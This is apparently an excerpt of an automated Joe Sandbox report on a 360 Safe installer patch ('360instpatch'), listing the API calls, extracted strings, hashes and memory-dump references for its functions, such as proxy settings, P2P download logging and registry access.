                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Mutex$CloseException@8HandleHeapProcessReleaseThrow$AllocCreateCurrentErrorLastObjectSingleWait__snwprintf__swprintf_memset_swscanf
                                                                                                                                                                                                              • String ID: %s %u$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
                                                                                                                                                                                                              • API String ID: 2967953817-332789905
                                                                                                                                                                                                              • Opcode ID: b28ae3e1f820c4bc60c286c63ed6298eeb20c6970046109500a207bac171fe64
                                                                                                                                                                                                              • Instruction ID: 47e4fd53f6c29f7560b8ecb166689e46e0b5157fbb5250fca621be9711019b4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b28ae3e1f820c4bc60c286c63ed6298eeb20c6970046109500a207bac171fe64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E85103B2840215AFDB10DFB4CC45BAF77B8EF05704F204199EA15EB250EB3896498BB1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B665AD
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 00B665D5
                                                                                                                                                                                                                • Part of subcall function 00B63197: InvalidateRect.USER32(?,00000000,00000000,?,?,00B60207,?), ref: 00B631AD
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EF), ref: 00B6665A
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F1), ref: 00B666B4
                                                                                                                                                                                                                • Part of subcall function 00B5F7D0: SetWindowLongW.USER32(?,000000FC,?), ref: 00B5F7F6
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000411), ref: 00B666E7
                                                                                                                                                                                                              • GetDlgItem.USER32(000000FF,000003F6), ref: 00B66774
                                                                                                                                                                                                                • Part of subcall function 00B46C96: SetWindowLongW.USER32(?,000000FC,?), ref: 00B46CBC
                                                                                                                                                                                                              • GetDlgItem.USER32(000000FF,000003EA), ref: 00B667C4
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000,000000E5,PNG,00000004,?), ref: 00B6680B
                                                                                                                                                                                                              • GetDlgItem.USER32(000000FF,0000040F), ref: 00B6686E
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B668A2
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00B668B0
                                                                                                                                                                                                              • GetDlgItem.USER32(000000FF,00000410), ref: 00B668DC
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00B66903
                                                                                                                                                                                                              • GetDlgItem.USER32(000000FF,00000409), ref: 00B66932
                                                                                                                                                                                                                • Part of subcall function 00B6134F: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000006,?,?,00000000,?,?,?,00B477F9,0000013F,PNG), ref: 00B613A1
                                                                                                                                                                                                              • GetDlgItem.USER32(000000FF,000003ED), ref: 00B669D2
                                                                                                                                                                                                                • Part of subcall function 00B662CA: __EH_prolog3.LIBCMT ref: 00B662D1
                                                                                                                                                                                                                • Part of subcall function 00B61610: EnableWindow.USER32(?,?), ref: 00B6161B
                                                                                                                                                                                                                • Part of subcall function 00B61610: InvalidateRect.USER32(?,00000000,00000001,?,?,00B45AF9,?), ref: 00B6162A
                                                                                                                                                                                                                • Part of subcall function 00B61610: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00B45AF9,?), ref: 00B6163C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$Window$Show$H_prolog3InvalidateLongRect$EnableMessageRedrawSend
                                                                                                                                                                                                              • String ID: PNG
                                                                                                                                                                                                              • API String ID: 1363821098-364855578
                                                                                                                                                                                                              • Opcode ID: 402503dbca1896c736324a5b2a9d2d72e02b307ba7e55aeb13f70880c1d69b8b
                                                                                                                                                                                                              • Instruction ID: 33a4c237f0e70a05ba2adca08f6a14456caca3b6aee14d3d901a409efdc347c5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 402503dbca1896c736324a5b2a9d2d72e02b307ba7e55aeb13f70880c1d69b8b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FDD17B30540B09ABDB24EB70CC96FEAB7E4AF14711F404998B16B671E2EF706A48CB15

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF05644
                                                                                                                                                                                                                • Part of subcall function 6BF01914: __EH_prolog3.LIBCMT ref: 6BF0191B
                                                                                                                                                                                                                • Part of subcall function 6BF01914: GetTickCount.KERNEL32 ref: 6BF01926
                                                                                                                                                                                                                • Part of subcall function 6BF01914: GetTickCount.KERNEL32 ref: 6BF01930
                                                                                                                                                                                                                • Part of subcall function 6BF01914: GetTickCount.KERNEL32 ref: 6BF01940
                                                                                                                                                                                                              • _wcsncpy.LIBCMT ref: 6BF056F7
                                                                                                                                                                                                              • _wcsncpy.LIBCMT ref: 6BF05716
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF05775
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF05786
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF05797
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF0583E
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF05855
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF0586C
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF0590A
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 6BF05949
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,http://,?,?,?,00000000,00000000,000000FF,?,?,?,?,?,0000000C), ref: 6BF05959
                                                                                                                                                                                                                • Part of subcall function 6BF0429A: __EH_prolog3.LIBCMT ref: 6BF042B3
                                                                                                                                                                                                                • Part of subcall function 6BF0429A: StrStrIW.SHLWAPI(?,file://,00000001,00000000,00000000,00000000,000000FF), ref: 6BF0436A
                                                                                                                                                                                                                • Part of subcall function 6BF0429A: _wcslen.LIBCMT ref: 6BF0438A
                                                                                                                                                                                                                • Part of subcall function 6BF0429A: _wcslen.LIBCMT ref: 6BF04398
                                                                                                                                                                                                                • Part of subcall function 6BF0429A: _wcslen.LIBCMT ref: 6BF043AB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$_memset$CountH_prolog3Tick$_wcsncpy
                                                                                                                                                                                                              • String ID: [Update Ie Proxy] WPAD[%d], Proxy[%s], PAC[%s], DialUp[%d]$http://$http=$socks=
                                                                                                                                                                                                              • API String ID: 2113534588-487906059
                                                                                                                                                                                                              • Opcode ID: 01ed30d33635760582ee4902ba68b7500b00201235740488d88cbc48b3eadae3
                                                                                                                                                                                                              • Instruction ID: 28ca380560a5266b4a59b44aba0b55445e4829200540159fe1f684ead109901f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01ed30d33635760582ee4902ba68b7500b00201235740488d88cbc48b3eadae3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0A17F73500609DBDB20CF74CC91AEA73F8BF44314F10452AEA19DA260EF78EA44DBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF3AB44: __EH_prolog3_catch.LIBCMT ref: 6BF3AB4B
                                                                                                                                                                                                              • GetLastError.KERNEL32(AA5945B3,00000000,?,00000000), ref: 6BEF4FA7
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000001,AA5945B3,00000000,?,00000000), ref: 6BEF5020
                                                                                                                                                                                                                • Part of subcall function 6BF1BFAE: __EH_prolog3.LIBCMT ref: 6BF1BFB5
                                                                                                                                                                                                                • Part of subcall function 6BF1BFAE: _memset.LIBCMT ref: 6BF1C152
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BEF53F1
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BEF54D6
                                                                                                                                                                                                                • Part of subcall function 6BF23F7C: _memset.LIBCMT ref: 6BF23FAF
                                                                                                                                                                                                                • Part of subcall function 6BF23F7C: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 6BF23FCA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ERR_HTTPMGR_DNS_NOT_FINISH, xrefs: 6BEF556F
                                                                                                                                                                                                              • [%d.] Start Through FireWall http protocol PickIp Failed, xrefs: 6BEF5204
                                                                                                                                                                                                              • ERR_HTTPMGR_NOT_IP, xrefs: 6BEF510B, 6BEF552A
                                                                                                                                                                                                              • [%d.] proxy=%d,Errcode = %u(%s), , xrefs: 6BEF5581
                                                                                                                                                                                                              • [%d.] ErrorCode = %d,, xrefs: 6BEF502D
                                                                                                                                                                                                              • [%d.%3d] , xrefs: 6BEF52EF
                                                                                                                                                                                                              • [%d.] Start Through FireWall http protocol PickUrl Failed, xrefs: 6BEF509D
                                                                                                                                                                                                              • [%d.] Errcode = %u(%s), xrefs: 6BEF5122
                                                                                                                                                                                                              • [%d.%3d] ConnectNum = %d, xrefs: 6BEF54F7
                                                                                                                                                                                                              • [%d.] ErrorCode = %d , , xrefs: 6BEF4FB4
                                                                                                                                                                                                              • [%d.] proxy=%d,Errcode = %u(%s), , xrefs: 6BEF5547
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$ErrorLast$CountH_prolog3H_prolog3_catchTickwvnsprintf
                                                                                                                                                                                                              • String ID: ERR_HTTPMGR_DNS_NOT_FINISH$ERR_HTTPMGR_NOT_IP$[%d.%3d] $[%d.%3d] ConnectNum = %d$[%d.] ErrorCode = %d , $[%d.] Errcode = %u(%s)$[%d.] ErrorCode = %d,$[%d.] Start Through FireWall http protocol PickIp Failed$[%d.] Start Through FireWall http protocol PickUrl Failed$[%d.] proxy=%d,Errcode = %u(%s), $[%d.] proxy=%d,Errcode = %u(%s),
                                                                                                                                                                                                              • API String ID: 2301807879-2515552278
                                                                                                                                                                                                              • Opcode ID: ad54e349a54a371b914d9978752e331c618910dcb0800a83917811d56dd55238
                                                                                                                                                                                                              • Instruction ID: b898d9655538acce0ba5db0dc17f382aaa5b7d41cd63b0e4f0868087f86d523f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad54e349a54a371b914d9978752e331c618910dcb0800a83917811d56dd55238
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD024B71A003059FEB10CFB4C841BAE77FAEF04304F20856DE95A97291DB3EA955CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BF2E732
                                                                                                                                                                                                                • Part of subcall function 6BEFAE3C: KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,6BF78AA8,00000018,6BF2E73E,00000000), ref: 6BEFAE6F
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 6BF2E760
                                                                                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 6BF2E780
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 6BF2E788
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,360AsyncNetwork,360AsyncNetwork,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BF2E795
                                                                                                                                                                                                                • Part of subcall function 6BF2C5B6: SetTimer.USER32(?,00000000,00000064,00000000), ref: 6BF2C5D6
                                                                                                                                                                                                              • SetEvent.KERNEL32(?,00000000), ref: 6BF2E7B3
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 6BF2E7C4
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 6BF2E7CE
                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 6BF2E7DB
                                                                                                                                                                                                              • DestroyWindow.USER32(?,00000000), ref: 6BF2E7F0
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 6BF2E7F7
                                                                                                                                                                                                              • UnregisterClassW.USER32(360AsyncNetwork,00000000), ref: 6BF2E7FF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleModule$ClassDispatcherMessageUserWindow$CallbackCreateCurrentDestroyDispatchEventExceptionRegisterThreadTimerTranslateUnregister
                                                                                                                                                                                                              • String ID: 0$360AsyncNetwork$p2sp.Network
                                                                                                                                                                                                              • API String ID: 4253188931-2555541505
                                                                                                                                                                                                              • Opcode ID: abbda58daa3d984bd4bd338538025021b94fbea49de6136526d81ac54af83728
                                                                                                                                                                                                              • Instruction ID: dc5d48a66f554959f1932968021658963ab893a929b83e550e70b95904b6f76f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: abbda58daa3d984bd4bd338538025021b94fbea49de6136526d81ac54af83728
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0521D8B3D21228ABDF519FE5CC489DEBFBCFF5A651B10405AF501E2120DB788905CBA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] DUQuota stop, xrefs: 6BF0BB87
                                                                                                                                                                                                              • [%d.%3d] CheckTimeout StartP2PDownloads, xrefs: 6BF0BD48
                                                                                                                                                                                                              • [%d.] SetP2pSpeedLimitState;%d., xrefs: 6BF0BBB2
                                                                                                                                                                                                              • [%d.] BackupZone enable all task., xrefs: 6BF0B943
                                                                                                                                                                                                              • [%d.] [Resource] StartResourceConnect., xrefs: 6BF0B89C
                                                                                                                                                                                                              • [%d.] slow speed :%d close NonUrgentMode ., xrefs: 6BF0B9FE
                                                                                                                                                                                                              • [%d.] HttpMgr ReBoot , xrefs: 6BF0BE7B
                                                                                                                                                                                                              • [%d.] P2P Delay End:%d , xrefs: 6BF0BD03
                                                                                                                                                                                                              • [%d.] Downlaod OnTimeout Failed:%d , xrefs: 6BF0BAD0
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$CountH_prolog3Tick
                                                                                                                                                                                                              • String ID: [%d.%3d] CheckTimeout StartP2PDownloads$[%d.] BackupZone enable all task.$[%d.] DUQuota stop$[%d.] Downlaod OnTimeout Failed:%d $[%d.] HttpMgr ReBoot $[%d.] P2P Delay End:%d $[%d.] SetP2pSpeedLimitState;%d.$[%d.] [Resource] StartResourceConnect.$[%d.] slow speed :%d close NonUrgentMode .
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$htonlhtonsinet_addr
                                                                                                                                                                                                              • String ID: 180.153.227.168$[Tracker]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\LiveUpdate360,00000000,000F003F,6BFCC288,00000000,6BF8AC78,74DF30D0,?,6BFCC3F0,6BFCC288), ref: 6BF26DF2
                                                                                                                                                                                                              • RegCreateKeyExW.KERNEL32(80000002,SOFTWARE\LiveUpdate360,00000000,00000000,00000000,000F003F,00000000,6BFCC288,?,?,6BFCC3F0,6BFCC288), ref: 6BF26E17
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\LiveUpdate360,00000000,000F003F,6BFCC288,?,6BFCC3F0,6BFCC288), ref: 6BF26E2D
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\LiveUpdate360,00000000,00000000,00000000,000F003F,00000000,6BFCC288,?,?,6BFCC3F0,6BFCC288), ref: 6BF26E4A
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\LiveUpdate360,00000000,00020019,6BFCC3F0), ref: 6BF26E71
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(6BFCC3F0), ref: 6BF26EF4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Open$Create$Close
                                                                                                                                                                                                              • String ID: Intranet$Neverup$SOFTWARE\LiveUpdate360$customhttp$customproxytype$customsocks$ieproxy$proxytype
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BF0E546
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6BF0E56A
                                                                                                                                                                                                              • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 6BF0E5F1
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BF0E600
                                                                                                                                                                                                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 6BF0E628
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BF0E632
                                                                                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 6BF0E64B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BF0E658
                                                                                                                                                                                                              • CreateSemaphoreW.KERNEL32(00000000,?,?,00000000), ref: 6BF0E67C
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BF0E685
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Create$TimerWaitable$Exception@8H_prolog3_catchMutexSemaphoreThrow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BEE8892
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6BEE88B6
                                                                                                                                                                                                              • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 6BEE8918
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE8927
                                                                                                                                                                                                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 6BEE894F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE8959
                                                                                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 6BEE8972
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE897F
                                                                                                                                                                                                              • CreateSemaphoreW.KERNEL32(00000000,?,?,00000000), ref: 6BEE89A3
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE89AC
                                                                                                                                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,?,00000000), ref: 6BEE89C8
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE89D1
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 6BEE89F3
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE89FC
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Create$SemaphoreTimerWaitable$EventException@8H_prolog3_catchMutexThrow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2170963793-0
                                                                                                                                                                                                              • Opcode ID: 15f812b2dae9a83ab4e4f0ae0571bc36f5a4099c3560ce3d86cb3f3edc7d99bf
                                                                                                                                                                                                              • Instruction ID: 6f88f3f1356e219e7286d44de6db01e924f3a2e5a6efbdad5a5419e51d2425c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15f812b2dae9a83ab4e4f0ae0571bc36f5a4099c3560ce3d86cb3f3edc7d99bf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E515EB1910308DFDB64DFA8D884A9EBBF8FB08304F50446EE906E3650E375A9458F71
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B7EA49
                                                                                                                                                                                                                • Part of subcall function 00B787F5: _memset.LIBCMT ref: 00B78838
                                                                                                                                                                                                                • Part of subcall function 00B787F5: __wsplitpath.LIBCMT ref: 00B78845
                                                                                                                                                                                                                • Part of subcall function 00B787F5: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B78874
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B7EA8E
                                                                                                                                                                                                                • Part of subcall function 00B82080: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,00B7EAA4,?,?,00100000,00000000,0000008C), ref: 00B820EE
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7EC0A
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000001,00100000,00000000,0000008C), ref: 00B7EC1F
                                                                                                                                                                                                              • PathAppendW.SHLWAPI(?,360\360Safe), ref: 00B7EC2D
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B7EC63
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00B7ED12
                                                                                                                                                                                                                • Part of subcall function 00B1DFB0: __CxxThrowException@8.LIBCMT ref: 00B1DFC2
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7ED82
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000026,00000001), ref: 00B7ED94
                                                                                                                                                                                                              • PathAppendW.SHLWAPI(00000000,360Safe), ref: 00B7ED9F
                                                                                                                                                                                                                • Part of subcall function 00B3F087: std::_String_base::_Xlen.LIBCPMT ref: 00B3F09C
                                                                                                                                                                                                                • Part of subcall function 00B2A8EB: _wcsnlen.LIBCMT ref: 00B2A91D
                                                                                                                                                                                                                • Part of subcall function 00B7E951: __EH_prolog3.LIBCMT ref: 00B7E958
                                                                                                                                                                                                                • Part of subcall function 00B7E334: __EH_prolog3.LIBCMT ref: 00B7E33B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$H_prolog3_memset$AppendFolderSpecialUnothrow_t@std@@@__ehfuncinfo$??2@$CountCriticalDiskException@8FreeInitializeSectionSpaceString_base::_ThrowTickXlen__wsplitpath_wcsnlenstd::_
                                                                                                                                                                                                              • String ID: 360Safe$360\360Safe$:\360Safe
                                                                                                                                                                                                              • API String ID: 1315137449-2735685471
                                                                                                                                                                                                              • Opcode ID: 8e9a4c2130e6ed0b1183c1a4f032d98bf4eeddfded37a853fe56b2a805ee60ea
                                                                                                                                                                                                              • Instruction ID: f19ad740db62ceecc89ebd16fe8ff9008d6a3c1b1bb24661df6b4c8c31d5d31f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9a4c2130e6ed0b1183c1a4f032d98bf4eeddfded37a853fe56b2a805ee60ea
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8E15F71D00229DBCF15EBA4CC96AEEB7F5EF08310F1444A9F429A7291DB309A45CBA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6CD9A871
                                                                                                                                                                                                                • Part of subcall function 6CD2C2CF: lstrlenW.KERNEL32(00000010,THEME.UI,?,00000000,6CD40BA5,?,00000008,6CD4DEF0,?,00000010,?), ref: 6CD2C2F9
                                                                                                                                                                                                                • Part of subcall function 6CDAA9FC: __EH_prolog3.LIBCMT ref: 6CDAAA03
                                                                                                                                                                                                                • Part of subcall function 6CDAA916: __EH_prolog3.LIBCMT ref: 6CDAA91D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3$lstrlen
                                                                                                                                                                                                              • String ID: %d,%d,%d,%d$0,0,0,0$0x%x$anchor$bound$control_style$margin$shortcut$style$tab_id$tip$zl
                                                                                                                                                                                                              • API String ID: 1485999228-1181160698
                                                                                                                                                                                                              • Opcode ID: 72fa7020ed6a41ec7dfc0dba70d49e3c44a3f0c6c3ff1c4e6102c78218f3abce
                                                                                                                                                                                                              • Instruction ID: b30211d0d2ccb6dd37b27bc40fc537d0b8386d4e8b6f8149236e08a3961419c2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72fa7020ed6a41ec7dfc0dba70d49e3c44a3f0c6c3ff1c4e6102c78218f3abce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D49184B1E14248BBDF05EBD9C801AEEBFB9AF99218F10454DF10573790CB395A0487B6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BF0D174
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF0D188
                                                                                                                                                                                                                • Part of subcall function 6BEE8514: char_traits.LIBCPMT ref: 6BEE8539
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF0D391
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,manual_v3,00000000,?), ref: 6BF0D3D0
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 6BF0D3E4
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,PeerNumPerS,00000000,?,00000000,?), ref: 6BF0D413
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 6BF0D42C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCountQueryTickValue$H_prolog3_char_traits
                                                                                                                                                                                                              • String ID: PeerNumPerS$[%d.] File = %s $[%d.] FileName = %s$[%d.] Task Start$manual_v3
                                                                                                                                                                                                              • API String ID: 3290833672-1291513648
                                                                                                                                                                                                              • Opcode ID: e026fd41c106cb45f75b6855170665237406e2282b949985adf63802f1065906
                                                                                                                                                                                                              • Instruction ID: f0c06480669b451c898fc155e156d8e0db242c9e23cf5c102986911519861c3a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e026fd41c106cb45f75b6855170665237406e2282b949985adf63802f1065906
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5581AC77940B06EFDB24CFA4C8A0AAAB7F6BF45304F00456DE86692270DB39E544DB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B92A1F
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards,00000000,00000008,?,?,?,?), ref: 00B92A3A
                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,00BFCDA4,?,?,?,?), ref: 00B92A6C
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,?,?,?,?), ref: 00B92A96
